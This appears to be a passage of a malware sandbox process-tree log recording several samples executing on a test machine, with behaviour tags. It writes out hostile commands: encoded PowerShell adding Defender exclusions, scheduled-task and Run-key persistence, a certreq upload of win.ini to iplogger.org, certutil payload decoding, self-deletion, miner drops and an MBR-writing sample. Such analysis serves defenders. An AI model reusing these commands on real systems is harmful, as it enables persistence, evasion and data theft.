                                                                                                                                                powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                                                                                                                                                3⤵
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:3956
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
                                                                                                                                                3⤵
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:3968
                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                              "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
                                                                                                                                              2⤵
                                                                                                                                                PID:776
                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                  PID:4456
                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\zqawds.exe"
                                                                                                                                                2⤵
                                                                                                                                                  PID:4824
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\zqawds.exe
                                                                                                                                                    C:\Users\Admin\AppData\Roaming\zqawds.exe
                                                                                                                                                    3⤵
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:916
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5364
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:3652
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
                                                                                                                                                            5⤵
                                                                                                                                                              PID:5504
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5452
                                                                                                                                                            • C:\Windows\System32\conhost.exe
                                                                                                                                                              "C:\Windows\System32\conhost.exe" "wixbkzqmha"
                                                                                                                                                              5⤵
                                                                                                                                                                PID:1480
                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                              C:\Windows\explorer.exe vkhmukwpagbhgxxs0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJS6kTcb2sZJ49Q3iSMDc1H0Gsol2ut25e0CiIvlYsuJiRf9cAIWsM5xNiv2CpmeSTZ4pQrFWNkEzZPEMfhraeOvsLhWY3jY+xzJ5IosXqgTdD3jVluCpzDi91PFz8FAJKOCtA6KcYwvQwF802MT/V1n/CnG34YKGCYZXIU4zRQW7lEbRoAvFGVxIf4tKfOP3Hf6S6LyTk2jeuhzzf2Zcs/0s5y+xhTpkhMOajNG7ary/m9cgvIxlkbwK4Z5kKm8TURafQOdOA6pYc+FSLPejIrpYVXzGzUYCucc1JnrFsvlMQn0ihvM4UYwSpRyIOiJG/Ku6F7NGOK/Ye1L7T6a3ZENVZhlQpPYYNgPEbnhEJs092J41opYOyT9/sUeOPXCLeCFm3ZCgbWVjF7QlJgl7+XRi1qxQqCVy15JYwYPI4ueAg==
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5648
                                                                                                                                                        • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                          "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap30453:190:7zEvent11607
                                                                                                                                                          1⤵
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:3120
                                                                                                                                                        • C:\Users\Admin\Downloads\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe
                                                                                                                                                          "C:\Users\Admin\Downloads\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe"
                                                                                                                                                          1⤵
                                                                                                                                                          • Checks computer location settings
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:2584
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c echo UfkgJKZQP
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4996
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c certreq -post -config https://iplogger.org/1arur7 C:\Windows\win.ini
                                                                                                                                                              2⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:5524
                                                                                                                                                              • C:\Windows\SysWOW64\certreq.exe
                                                                                                                                                                certreq -post -config https://iplogger.org/1arur7 C:\Windows\win.ini
                                                                                                                                                                3⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:5440
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c cmd < OLicGk.com
                                                                                                                                                              2⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:4572
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd
                                                                                                                                                                3⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:4744
                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                  ping -n 1 ALq.Iqg
                                                                                                                                                                  4⤵
                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                  PID:4108
                                                                                                                                                                • C:\Windows\SysWOW64\certutil.exe
                                                                                                                                                                  certutil -decode gvceXcfUhq.com U
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Manipulates Digital Signatures
                                                                                                                                                                  • Deobfuscate/Decode Files or Information
                                                                                                                                                                  PID:5248
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.com
                                                                                                                                                                  msdtc.com U
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:2492
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.com
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.com U
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                    PID:2512
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      PID:452
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\rNjcikt & timeout 2 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:440
                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                            timeout 2
                                                                                                                                                                            8⤵
                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                            PID:6092
                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                    ping 127.0.0.1 -n 3
                                                                                                                                                                    4⤵
                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                    PID:5876
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c cmd < iphPyYJYUVPAWekxoF.com
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5284
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:2180
                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        ping -n 1 ovPEN.QDIv
                                                                                                                                                                        4⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                        PID:5140
                                                                                                                                                                      • C:\Windows\SysWOW64\certutil.exe
                                                                                                                                                                        certutil -decode QrHZW.com T
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Deobfuscate/Decode Files or Information
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:2380
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\lsm.com
                                                                                                                                                                        lsm.com T
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:2836
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\lsm.com
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\lsm.com T
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                          PID:4072
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                            PID:3360
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\xmmnrlv.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:4192
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\qqlrtqid.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:3916
                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        ping 127.0.0.1 -n 3
                                                                                                                                                                        4⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                        PID:2776
                                                                                                                                                                • C:\Users\Admin\Downloads\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe
                                                                                                                                                                  "C:\Users\Admin\Downloads\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe"
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:2428
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c echo UfkgJKZQP
                                                                                                                                                                    2⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:4420
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c certreq -post -config https://iplogger.org/1arur7 C:\Windows\win.ini
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1744
                                                                                                                                                                      • C:\Windows\SysWOW64\certreq.exe
                                                                                                                                                                        certreq -post -config https://iplogger.org/1arur7 C:\Windows\win.ini
                                                                                                                                                                        3⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:2092
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c cmd < OLicGk.com
                                                                                                                                                                      2⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:2024
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd
                                                                                                                                                                        3⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:5868
                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                          ping -n 1 ALq.Iqg
                                                                                                                                                                          4⤵
                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                          PID:3508
                                                                                                                                                                        • C:\Windows\SysWOW64\certutil.exe
                                                                                                                                                                          certutil -decode gvceXcfUhq.com U
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Deobfuscate/Decode Files or Information
                                                                                                                                                                          PID:3304
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\msdtc.com
                                                                                                                                                                          msdtc.com U
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                          PID:4076
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\nslookup.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\nslookup.exe
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            PID:820
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\fkYq7clGHar & timeout 2 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\nslookup.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:1432
                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                  timeout 2
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                  PID:3168
                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                            ping 127.0.0.1 -n 3
                                                                                                                                                                            4⤵
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                            PID:2044
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c cmd < iphPyYJYUVPAWekxoF.com
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:1248
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            cmd
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5136
                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                ping -n 1 ovPEN.QDIv
                                                                                                                                                                                4⤵
                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                PID:1400
                                                                                                                                                                              • C:\Windows\SysWOW64\certutil.exe
                                                                                                                                                                                certutil -decode QrHZW.com T
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Deobfuscate/Decode Files or Information
                                                                                                                                                                                PID:4468
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\lsm.com
                                                                                                                                                                                lsm.com T
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                PID:2596
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\nslookup.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\nslookup.exe
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                  PID:228
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\antehobr.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:6052
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\kkkwnmdv.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:3220
                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                    ping 127.0.0.1 -n 3
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                    PID:3388
                                                                                                                                                                            • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                              "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap4594:566:7zEvent29748
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:5944
                                                                                                                                                                              • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap9103:566:7zEvent4671
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:872
                                                                                                                                                                                • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\" -ad -an -ai#7zMap11125:190:7zEvent4054
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:1772
                                                                                                                                                                                  • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                    "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap26577:190:7zEvent19599
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:5964
                                                                                                                                                                                    • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                      "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap5789:190:7zEvent12852
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:5456
                                                                                                                                                                                      • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap14849:78:7zEvent8075
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:2416
                                                                                                                                                                                        • C:\Users\Admin\Downloads\MEMZ.exe
                                                                                                                                                                                          "C:\Users\Admin\Downloads\MEMZ.exe"
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                          PID:2756
                                                                                                                                                                                          • C:\Users\Admin\Downloads\MEMZ.exe
                                                                                                                                                                                            "C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                            PID:5228
                                                                                                                                                                                          • C:\Users\Admin\Downloads\MEMZ.exe
                                                                                                                                                                                            "C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                            PID:5232
                                                                                                                                                                                          • C:\Users\Admin\Downloads\MEMZ.exe
                                                                                                                                                                                            "C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                            PID:1556
                                                                                                                                                                                          • C:\Users\Admin\Downloads\MEMZ.exe
                                                                                                                                                                                            "C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                            PID:4060
                                                                                                                                                                                          • C:\Users\Admin\Downloads\MEMZ.exe
                                                                                                                                                                                            "C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                            PID:1564
                                                                                                                                                                                          • C:\Users\Admin\Downloads\MEMZ.exe
                                                                                                                                                                                            "C:\Users\Admin\Downloads\MEMZ.exe" /main
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Writes to the Master Boot Record (MBR)
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                            PID:5436
                                                                                                                                                                                            • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                              "C:\Windows\System32\notepad.exe" \note.txt
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4976
                                                                                                                                                                                          • C:\Windows\System32\WScript.exe
                                                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:220
                                                                                                                                                                                            • C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
                                                                                                                                                                                              "C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:920
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\xmrmine.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\xmrmine.exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:4732
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\etcmin.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\etcmin.exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:1740
                                                                                                                                                                                            • C:\Windows\System32\WScript.exe
                                                                                                                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:3868
                                                                                                                                                                                              • C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe
                                                                                                                                                                                                "C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe"
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                PID:3680
                                                                                                                                                                                                • C:\Users\Admin\hSYcgEcU\uYQUIwYA.exe
                                                                                                                                                                                                  "C:\Users\Admin\hSYcgEcU\uYQUIwYA.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                  PID:5776
                                                                                                                                                                                                • C:\ProgramData\dkYkUUoU\OmwEcoEM.exe
                                                                                                                                                                                                  "C:\ProgramData\dkYkUUoU\OmwEcoEM.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                  PID:3240
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                  PID:4044
                                                                                                                                                                                                  • C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe
                                                                                                                                                                                                    C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    PID:4168
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:4068
                                                                                                                                                                                                      • C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe
                                                                                                                                                                                                        C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:3360
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423"
                                                                                                                                                                                                          6⤵
